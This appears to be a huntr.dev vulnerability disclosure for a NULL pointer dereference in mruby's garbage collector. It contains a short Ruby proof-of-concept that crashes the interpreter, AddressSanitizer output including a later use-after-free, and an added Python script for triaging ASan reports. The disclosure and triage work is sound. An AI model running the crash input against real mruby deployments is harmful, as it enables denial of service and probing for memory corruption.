NULL Pointer Dereference in mruby/mruby
Reported on Dec 10th 2021
Description
NULL Pointer Dereference in mrb_full_gc
Proof of Concept
( *a = () )
a.<<.take_while{ a.drop_while {Enumerable ; a<<lambda {}}}
Result
./master/asan_mruby/bin/mirb ./crash.rb
mirb - Embeddable Interactive Ruby Shell
=> nil
AddressSanitizer:DEADLYSIGNAL
=================================================================
==21352==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x556b44382444 bp 0x7fff4e9961d0 sp 0x7fff4e9961b0 T0)
==21352==The signal is caused by a READ memory access.
==21352==Hint: address points to the zero page.
#0 0x556b44382443 in mrb_full_gc /root/master/asan_mruby/src/gc.c:1317
#1 0x556b4438276b in mrb_garbage_collect /root/master/asan_mruby/src/gc.c:1350
#2 0x556b44386737 in mrb_irep_incref /root/master/asan_mruby/src/state.c:114
#3 0x556b4444780a in mrb_proc_copy /root/master/asan_mruby/src/proc.c:213
#4 0x556b44448162 in proc_lambda /root/master/asan_mruby/src/proc.c:284
#5 0x556b4439f98c in mrb_vm_exec /root/master/asan_mruby/src/vm.c:1637
#6 0x556b44391018 in mrb_vm_run /root/master/asan_mruby/src/vm.c:1091
#7 0x556b443034eb in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:670
#8 0x7f192ee230b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#9 0x556b4430048d in _start (/root/master/asan_mruby/bin/mirb+0xbe48d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/master/asan_mruby/src/gc.c:1317 in mrb_full_gc
==21352==ABORTING
Hi @Matz, looks like your fix is incomplete.
mruby/bin/mirb test.rb
mirb - Embeddable Interactive Ruby Shell
=> nil
too many irep references (RuntimeError)
=================================================================
==4326==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a6 at pc 0x555880ee8b49 bp 0x7ffd45311cb0 sp 0x7ffd45311ca0
READ of size 1 at 0x6070000003a6 thread T0
#0 0x555880ee8b48 in mrb_irep_cutref /root/master/asan_mruby/src/state.c:138
#1 0x555880ee2170 in obj_free /root/master/asan_mruby/src/gc.c:871
#2 0x555880edf78c in free_heap /root/master/asan_mruby/src/gc.c:433
#3 0x555880edf7e4 in mrb_gc_destroy /root/master/asan_mruby/src/gc.c:442
#4 0x555880ee928d in mrb_close /root/master/asan_mruby/src/state.c:195
#5 0x555880e659c6 in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:713
#6 0x7fa03c6cd0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#7 0x555880e6248d in _start (/root/master/asan_mruby/bin/mirb+0xbf48d)
0x6070000003a6 is located 6 bytes inside of 72-byte region [0x6070000003a0,0x6070000003e8)
freed by thread T0 here:
#0 0x7fa03caf47cf in __interceptor_free (/lib/x86_64-linux-gnu/libasan.so.5+0x10d7cf)
#1 0x555880ee87a3 in mrb_default_allocf /root/master/asan_mruby/src/state.c:64
#2 0x555880edeb69 in mrb_free /root/master/asan_mruby/src/gc.c:288
#3 0x555880ee9198 in mrb_irep_free /root/master/asan_mruby/src/state.c:174
#4 0x555880ee8af7 in mrb_irep_decref /root/master/asan_mruby/src/state.c:128
#5 0x555880ee2183 in obj_free /root/master/asan_mruby/src/gc.c:873
#6 0x555880edf78c in free_heap /root/master/asan_mruby/src/gc.c:433
#7 0x555880edf7e4 in mrb_gc_destroy /root/master/asan_mruby/src/gc.c:442
#8 0x555880ee928d in mrb_close /root/master/asan_mruby/src/state.c:195
#9 0x555880e659c6 in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:713
#10 0x7fa03c6cd0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
previously allocated by thread T0 here:
#0 0x7fa03caf4ffe in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dffe)
#1 0x555880ee87bd in mrb_default_allocf /root/master/asan_mruby/src/state.c:68
#2 0x555880ede83e in mrb_realloc_simple /root/master/asan_mruby/src/gc.c:226
#3 0x555880ede940 in mrb_realloc /root/master/asan_mruby/src/gc.c:240
#4 0x555880edea2d in mrb_malloc /root/master/asan_mruby/src/gc.c:256
#5 0x555880ee931a in mrb_add_irep /root/master/asan_mruby/src/state.c:208
#6 0x555880f69f00 in scope_add_irep /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3641
#7 0x555880f6a361 in scope_new /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3671
#8 0x555880f592b8 in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1294
#9 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
#10 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
#11 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
#12 0x555880f5b006 in gen_values /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1563
#13 0x555880f5ba5c in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1668
#14 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
#15 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
#16 0x555880f5a5ef in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1456
#17 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
#18 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
#19 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
#20 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
#21 0x555880f5a5ef in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1456
#22 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
#23 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
#24 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
#25 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
#26 0x555880f5a801 in scope_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1473
#27 0x555880f612ae in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2494
#28 0x555880f6c43d in generate_code /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3888
#29 0x555880f6c815 in mrb_generate_code /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3911
SUMMARY: AddressSanitizer: heap-use-after-free /root/master/asan_mruby/src/state.c:138 in mrb_irep_cutref
Shadow bytes around the buggy address:
0x0c0e7fff8020: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fd fd
0x0c0e7fff8030: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
0x0c0e7fff8040: fd fd fd fd fd fa fa fa fa fa fd fd fd fd fd fd
0x0c0e7fff8050: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c0e7fff8060: fd fa fa fa fa fa fd fd fd fd fd fd fd fd fd fa
=>0x0c0e7fff8070: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fa fa fa
0x0c0e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==4326==ABORTING
^ Disregard this. What presumably happened is that the follow-up to this became https://huntr.dev/bounties/59a70392-4864-4ce3-8e35-6ac2111d1e2e/
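The two sanitizer dumps above are the kind of output a fuzzing run over mruby produces by the hundred, so the useful next step is mechanical triage. The script below is an added example, not part of the original huntr report or of mruby: it parses an ASan report into the error class, faulting address, access type and the faulting/free/alloc stacks, labels a SEGV inside the zero page as a NULL pointer dereference (CWE-476) and heap-use-after-free as CWE-416, and builds a frame-based signature for bucketing duplicates. The CWE mapping, the 0x1000 zero-page threshold and the list of runtime frames to ignore are this example's own assumptions; SEGV_REPORT and UAF_REPORT are trimmed excerpts of the two reports on this page.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Added example, not from the original report or from mruby. The sample inputs
# at the bottom are trimmed excerpts of the two ASan reports on this page.
ERROR_RE = re.compile(r"==\d+==ERROR: AddressSanitizer: (?P<kind>[\w-]+)"
                      r"(?: on (?:unknown )?address (?P<addr>0x[0-9a-fA-F]+))?")
FRAME_RE = re.compile(r"#\d+ 0x[0-9a-fA-F]+ in (?P<func>\S+) (?P<loc>\S+)")
ACCESS_RE = re.compile(r"\b(READ|WRITE)\b")
ZERO_PAGE_LIMIT = 0x1000   # assumption: the first page is never mapped
NOISE = ("__libc_start_main", "_start", "__interceptor_")  # runtime frames, not the bug

@dataclass
class Frame:
    func: str
    loc: str

@dataclass
class Triage:
    kind: str
    address: Optional[int]
    cwe: str
    access: Optional[str] = None             # READ or WRITE
    access_stack: List[Frame] = field(default_factory=list)
    free_stack: List[Frame] = field(default_factory=list)
    alloc_stack: List[Frame] = field(default_factory=list)

    @property
    def top_frame(self) -> Optional[Frame]:
        return self.access_stack[0] if self.access_stack else None

    def signature(self, depth: int = 3) -> str:
        """Bucket key: error class plus the first `depth` non-runtime frames."""
        funcs = [f.func for f in self.access_stack if not f.func.startswith(NOISE)]
        return self.kind + ":" + "|".join(funcs[:depth])

def classify(kind: str, addr: Optional[int]) -> str:
    """CWE mapping is this example's own convention, not something ASan emits."""
    if kind == "SEGV":
        if addr is not None and addr < ZERO_PAGE_LIMIT:
            # a tiny fault address is a field offset added to a NULL struct pointer
            return "CWE-476 NULL pointer dereference (field offset 0x%x)" % addr
        return "CWE-119 invalid memory access (wild pointer)"
    return {"heap-use-after-free": "CWE-416 use after free",
            "heap-buffer-overflow": "CWE-122 heap-based buffer overflow",
            "stack-buffer-overflow": "CWE-121 stack-based buffer overflow",
            "double-free": "CWE-415 double free"}.get(kind, "unclassified: " + kind)

def triage(report: str) -> Triage:
    result, section = None, None   # section: which stack the next frames belong to
    for raw in report.splitlines():
        line = raw.strip()
        if result is None:         # skip everything before the ERROR line
            m = ERROR_RE.search(line)
            if m:
                addr = int(m.group("addr"), 16) if m.group("addr") else None
                result = Triage(m.group("kind"), addr, classify(m.group("kind"), addr))
                section = "access"
            continue
        if line.startswith("freed by thread"):
            section = "free"
        elif line.startswith("previously allocated by thread"):
            section = "alloc"
        elif line.startswith("SUMMARY:"):
            section = None
        elif (fm := FRAME_RE.match(line)) and section:
            getattr(result, section + "_stack").append(Frame(fm["func"], fm["loc"]))
        elif result.access is None and (am := ACCESS_RE.search(line)):
            result.access = am.group(1)
    if result is None:
        raise ValueError("no AddressSanitizer ERROR line in input")
    return result

SEGV_REPORT = """\
==21352==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x556b44382444 bp 0x7fff4e9961d0 sp 0x7fff4e9961b0 T0)
==21352==The signal is caused by a READ memory access.
==21352==Hint: address points to the zero page.
    #0 0x556b44382443 in mrb_full_gc /root/master/asan_mruby/src/gc.c:1317
    #1 0x556b4438276b in mrb_garbage_collect /root/master/asan_mruby/src/gc.c:1350
    #2 0x556b44386737 in mrb_irep_incref /root/master/asan_mruby/src/state.c:114
    #3 0x556b4444780a in mrb_proc_copy /root/master/asan_mruby/src/proc.c:213
    #8 0x7f192ee230b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
SUMMARY: AddressSanitizer: SEGV /root/master/asan_mruby/src/gc.c:1317 in mrb_full_gc
"""
UAF_REPORT = """\
==4326==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a6 at pc 0x555880ee8b49 bp 0x7ffd45311cb0 sp 0x7ffd45311ca0
READ of size 1 at 0x6070000003a6 thread T0
    #0 0x555880ee8b48 in mrb_irep_cutref /root/master/asan_mruby/src/state.c:138
    #1 0x555880ee2170 in obj_free /root/master/asan_mruby/src/gc.c:871
    #4 0x555880ee928d in mrb_close /root/master/asan_mruby/src/state.c:195
freed by thread T0 here:
    #0 0x7fa03caf47cf in __interceptor_free (/lib/x86_64-linux-gnu/libasan.so.5+0x10d7cf)
    #3 0x555880ee9198 in mrb_irep_free /root/master/asan_mruby/src/state.c:174
    #4 0x555880ee8af7 in mrb_irep_decref /root/master/asan_mruby/src/state.c:128
previously allocated by thread T0 here:
    #5 0x555880ee931a in mrb_add_irep /root/master/asan_mruby/src/state.c:208
SUMMARY: AddressSanitizer: heap-use-after-free /root/master/asan_mruby/src/state.c:138 in mrb_irep_cutref
"""
```

Run `triage(SEGV_REPORT)` and `triage(UAF_REPORT)` to see the two verdicts. The first report is classified as a NULL dereference rather than a wild read because the fault address 0x18 is a struct field offset with a NULL base, which matches ASan's own "zero page" hint and the top frame at gc.c:1317 in mrb_full_gc. For the second report the free stack is what makes it actionable: the irep released through mrb_irep_decref at state.c:128 is read again by mrb_irep_cutref from the same obj_free path during mrb_close, which is the pattern to look for when judging whether a refcount fix is complete.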